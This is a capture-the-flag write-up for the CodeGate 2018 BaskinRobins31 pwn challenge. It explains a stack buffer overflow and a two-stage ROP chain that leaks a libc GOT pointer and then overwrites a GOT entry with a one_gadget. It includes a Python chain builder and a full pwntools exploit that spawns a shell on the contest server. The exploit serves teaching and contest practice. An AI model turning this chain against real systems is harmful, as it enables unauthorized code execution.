CodeGate 2018 PWN BaskinRobins Write-up

Introduction

Finally back from the Spring Festival vacation. Since Readme-revenge is not a typical example of a ROP attack, I will use the easiest challenge in CodeGate 2018 to demonstrate how a ROP attack is built.

Vulnerability Analysis

The binary is not compiled as PIE, so its code, PLT and GOT live at fixed addresses (0x400000 and 0x602000 ranges), and it has no stack canary. Libc itself is still randomized by ASLR, which is why the exploit has to leak a libc address before it can use a libc gadget. Furthermore, there is an obvious stack buffer overflow in the function your_turn: the input read into its stack buffer is larger than the buffer, so the saved rbp and the return address can be overwritten.

Exploit Plan

The exploit is divided into two parts: (1) leak the libc version by constructing a ROP chain that reads a function pointer out of the GOT (the leaked address identifies the libc build and, minus the function's offset, gives the libc base); (2) construct a second ROP chain that calls read to overwrite a GOT entry with the address of the magic gadget (one_gadget), so the next call through that entry spawns a shell.
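The two stages above, written out as a small chain builder with the sanity checks a practitioner would run on the leaked pointer before trusting it. This is an added example, not code from the write-up: the addresses and the libc offsets (0xf7250 for the leaked function, 0xf1147 for the one_gadget) are the ones the exploit in this post uses, the gadget semantics (pop rdi; pop rsi; pop rdx; ret for 0x40087a) and the stack pivot through the read call at 0x4008f4 are inferred from how the chain is laid out, and the helper names (call3, stage1, stage2, stage3, libc_base_from_leak, parse_leak) and the check thresholds are mine. It uses only the standard library, so it runs without pwntools or the target.

```python
import struct

# Added example, not the write-up's code. Addresses and libc offsets are the
# ones the exploit in this post uses; the gadget semantics (pop rdi; pop rsi;
# pop rdx; ret for 0x40087a) are assumed from the chain layout, and the helper
# names and sanity checks below are mine.

POP_RDI_RSI_RDX = 0x40087a   # 3-pop gadget used before every call
READ_CALL       = 0x4008f4   # call to read() inside your_turn, followed by leave; ret
LEAK_CALL       = 0x400bbb   # code path that sends rdx bytes from rsi back to us
GOT_ENTRY       = 0x602028   # GOT slot that is leaked, then overwritten
BSS_STAGE2      = 0x6020c0   # stage-2 chain is read here and the stack pivots to it
BUF_SIZE        = 0xb0       # bytes from the overflowed buffer to the saved rbp

LEAKED_FUNC_OFF = 0xf7250    # offset of the leaked function inside the target libc
ONE_GADGET_OFF  = 0xf1147    # one_gadget offset inside the same libc


def p64(value):
    return struct.pack("<Q", value)


def u64(data):
    return struct.unpack("<Q", data)[0]


def call3(func, rdi, rsi, rdx):
    """Chain fragment: load the three argument registers, then return into func."""
    return p64(POP_RDI_RSI_RDX) + p64(rdi) + p64(rsi) + p64(rdx) + p64(func)


def stage1():
    """Overflow your_turn: fill the buffer, replace the saved rbp with a .bss
    address so the function's leave; ret pivots the stack there, and read
    stage 2 into that .bss area."""
    chain = b"A" * BUF_SIZE
    chain += p64(BSS_STAGE2 - 8)                    # new rbp: leave; ret continues at BSS_STAGE2
    chain += call3(READ_CALL, 0, BSS_STAGE2, 0x80)  # read(0, .bss, 0x80)
    chain += p64(0x424242424242) * 20               # padding the write-up sends
    return chain


def stage2():
    """Runs from .bss: leak GOT_ENTRY, then read 8 bytes over it."""
    chain = call3(LEAK_CALL, 0, GOT_ENTRY, 8)
    chain += p64(BSS_STAGE2) + p64(0x414141414141) * 4
    chain += p64(READ_CALL)                         # the next 8 bytes we send land in GOT_ENTRY
    if len(chain) > 0x80:                           # stage 1 only reads 0x80 bytes
        raise ValueError("stage 2 chain too long: %d bytes" % len(chain))
    return chain


def parse_leak(blob, index=7):
    """The write-up receives nine qwords after ':(' and uses the eighth."""
    qwords = [u64(blob[i:i + 8]) for i in range(0, 9 * 8, 8)]
    return qwords[index]


def libc_base_from_leak(leaked_ptr, func_offset=LEAKED_FUNC_OFF):
    """Turn a leaked GOT value into the libc base, refusing values that cannot be right."""
    # Lazy binding: until the function has been called once, its GOT entry still
    # points into the binary (non-PIE, loaded at 0x400000), not into libc.
    if leaked_ptr < 0x700000:
        raise ValueError("0x%x points into the binary: GOT entry not resolved yet" % leaked_ptr)
    base = leaked_ptr - func_offset
    # libc is mmap'ed, so its base is page-aligned; anything else means the
    # offset belongs to a different libc build or we picked the wrong qword.
    if base & 0xfff:
        raise ValueError("0x%x is not page-aligned: wrong libc offset or wrong leak qword" % base)
    return base


def stage3(libc_base):
    """The 8 bytes that overwrite GOT_ENTRY with the one_gadget address."""
    return p64(libc_base + ONE_GADGET_OFF)


if __name__ == "__main__":
    # Constructed leak, not a real capture: nine qwords, the eighth set to what the
    # leaked function would look like with libc mapped at 0x7ffff79fe000.
    fake_leak = b"".join(p64(0) for _ in range(7)) + p64(0x7ffff79fe000 + LEAKED_FUNC_OFF) + p64(0)
    base = libc_base_from_leak(parse_leak(fake_leak))
    print("stage1 %d bytes, stage2 %d bytes, libc base 0x%x, one_gadget 0x%x"
          % (len(stage1()), len(stage2()), base, u64(stage3(base))))
```

The two checks in libc_base_from_leak catch the two most common reasons a "leak" produces a wrong base: leaking a GOT slot that has not been resolved yet (it still holds a PLT address inside the binary), and using an offset from a libc build other than the target's (the base then stops being page-aligned). One more caveat: every one_gadget candidate comes with a register or stack constraint that must hold when the GOT entry is called, so if 0xf1147 does not pop a shell the fix is usually to try the other candidates one_gadget lists for that libc, not to change the chain.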

Exploit

from pwn import *
import sys
import time

# Usage: python exploit.py <mode>
#   0 = remote target, 1 = local process, 2 = local process with gdb attached
DEBUG = int(sys.argv[1])

if DEBUG == 0:
    r = remote("ch41l3ng3s.codegate.kr", 3131)
elif DEBUG == 1:
    r = process("./BaskinRobins31")
elif DEBUG == 2:
    r = process("./BaskinRobins31")
    gdb.attach(r, '''source ./script''')


def exploit():
    helper = 0x40087a          # 3-pop gadget: loads rdi, rsi, rdx, then ret
    junk = 0x424242424242
    payload = b"A" * 0xb0      # fill the stack buffer in your_turn up to the saved rbp

    payload += p64(0x6020b8)   # saved rbp: points into .bss, so leave; ret pivots the stack there
    payload += p64(helper)     # return address: start the chain
    # read(0, 0x6020c0, 0x80): the second-stage chain lands in .bss right after the new rbp,
    # so when the read call at 0x4008f4 returns through leave; ret, execution continues at 0x6020c0
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4)
    payload += p64(junk) * 20

    r.recvuntil(b"(1-3)")
    r.send(payload)

    time.sleep(2)              # let the first read finish before sending stage 2, so it is not swallowed with stage 1
    # Stage 2 (executed from 0x6020c0): with rsi = 0x602028 (a GOT entry) and rdx = 8,
    # return into 0x400bbb, which makes the program send that GOT entry back to us
    payload2 = p64(helper)
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb)
    payload2 += p64(0x6020c0) + p64(0x414141414141) * 4
    payload2 += p64(0x4008f4)  # read again: the next 8 bytes we send overwrite the GOT entry
    r.send(payload2)

    r.recvuntil(b":(")
    r.recv(2)

    # Nine qwords follow; the eighth is the libc function pointer from the GOT.
    # recvn() waits for the full 8 bytes, recv(8) may return fewer.
    leaks = [u64(r.recvn(8)) for _ in range(9)]
    for value in leaks[5:]:
        log.info("0x%x", value)

    libcBase = leaks[7] - 0xf7250    # offset of the leaked function in the target's libc
    log.info("Libc Base: 0x%x", libcBase)

    oneGadget = libcBase + 0xf1147   # one_gadget (execve("/bin/sh")) offset in the same libc
    payload3 = p64(oneGadget)
    r.send(payload3)                 # written over the GOT entry; the next call through it pops a shell

    r.interactive()


exploit()

Conclusion

It is not a difficult challenge, but it is a typical ROP one. Since Readme-revenge from 34C3 is more like a riddle, I use this challenge as my example of a ROP attack.
